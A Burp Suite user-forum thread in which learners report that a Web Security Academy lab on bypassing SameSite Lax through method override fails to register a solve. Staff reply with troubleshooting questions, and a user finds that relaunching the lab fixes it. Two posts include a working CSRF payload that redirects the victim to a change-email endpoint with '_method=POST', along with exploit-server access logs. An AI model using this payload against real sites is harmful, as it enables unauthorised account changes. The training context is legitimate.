Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

SameSite Lax bypass via method override Lab Broken

Z3r0 | Last updated: Jul 13, 2024 03:59PM UTC

This lab is broken, when sending the payload to the victim (the correct one listed in the solution and with a different mail) the victim simply does not visit it as you can see in the access log as I don't see an IP address other than my own. I have tried to restart the lab and changing the browser but it doesn't work either. - Payload ``` <html> <body> <script> document.location="https://0ab600b403cffccd80ba7c7b008700a5.web-security-academy.net/my-account/change-email?email=abcd%40gmail.com&_method=POST" </script> </body> </html> ``` - Access log ``` MY_IP 2024-07-13 15:49:39 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:49:40 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:13 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:13 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:15 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:15 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:20 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:20 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:26 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:26 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:26 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:53:49 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:18 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:18 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:20 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:20 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:25 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:25 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:58 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" ```

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 01:00PM UTC

Hi, If you use a standard version of Chrome, does this then allow you to solve this particular lab?

Z3r0 | Last updated: Jul 23, 2024 06:51PM UTC

Same thing

Ben, PortSwigger Agent | Last updated: Jul 24, 2024 07:36AM UTC

Hi, Are you able to provide us with some details of the payload and browser you are using?

Haxmaul | Last updated: Aug 29, 2024 05:23PM UTC

Mine shows delivered to victim but still not getting the Solved check mark. No issues with other labs so far. Anyone figure this out? Tested using Burps browser and my chrome (Version 128.0.6613.114 (Official Build) (64-bit)) when I "view exploit" it updates my email as it should. <html> <body> <script> document.location="https://0a4a00b803a634ed819fa1bb01cf0061.web-security-academy.net/my-account/change-email?email=3abcdfghertfg%40gmail.com&_method=POST" </script> </body> </html>

Dominyque, PortSwigger Agent | Last updated: Aug 30, 2024 09:15AM UTC

Hi Haxmaul, If you do not URL encode the email address, does this then work? Additionally, are you categorically sure that you are changing the email address in your exploit, after you view the exploit and before delivering it to the victim?

Haxmaul | Last updated: Aug 30, 2024 06:07PM UTC

I just went back and did it exactly the same as before and it worked. I also ran into a lab today where the victim wasn't visiting my exploit server as Z3r0 mentioned in the original post. I was able to get past this bug and solve the challenge as well. It seems the current solution is to close the lab in all browser instances and relaunch the lab so you get a new lab ID. Then just redo/paste your exploit in the new lab environment (ensure you update lab ID in your exploit script) and it should work. I'm really enjoying the labs and this is a pretty easy fix for the very few issues (2) I've come across.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.